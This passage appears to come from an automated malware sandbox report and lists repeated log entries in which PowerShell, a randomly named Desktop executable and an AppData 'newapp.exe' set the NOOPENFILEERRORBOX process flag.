Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\iNFGd6bDZX.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\newapp\newapp.exe	Process information set: NOOPENFILEERRORBOX
